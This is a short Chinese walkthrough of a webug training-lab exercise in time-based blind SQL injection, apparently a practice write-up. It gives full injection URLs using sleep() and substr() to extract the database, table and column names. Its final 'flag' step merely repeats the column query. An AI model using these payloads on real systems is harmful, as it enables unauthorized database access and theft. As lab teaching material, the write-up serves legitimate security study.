通过之前的报错可以得知sql语句
利用sleep()函数构造延时语句,发现页面延迟响应
和布尔注入一样,通过观察页面状态来猜测数据库名、表名等信息
爆当前数据库名
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1’and if(ascii(substr(database(),1,1))>118,1,sleep(5))%23
如果大于118返回1,否则执行sleep(5)
爆出当前数据库名webug
爆出webug下面的表
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘webug’ limit 0,1),1,1))>99,1,sleep(5))%23
爆出webug下的表:data_crud,env_list,env_path,flag,sqlinjection,user,user_test
在布尔关中知道flag在env_list下,直接爆env_list下的列
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1’and if(ascii(substr((select column_name from information_schema.columns where table_name=‘env_list’ limit 0,1),1,1))>104,1,sleep(5))%23
env_list的表里有:id,envName,envDesc,envIntegration,delFlag,envFlag,level,type
爆flag
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1’and if(ascii(substr((select column_name from information_schema.columns where table_name=‘env_list’ limit 0,1),1,1))>104,1,sleep(5))%23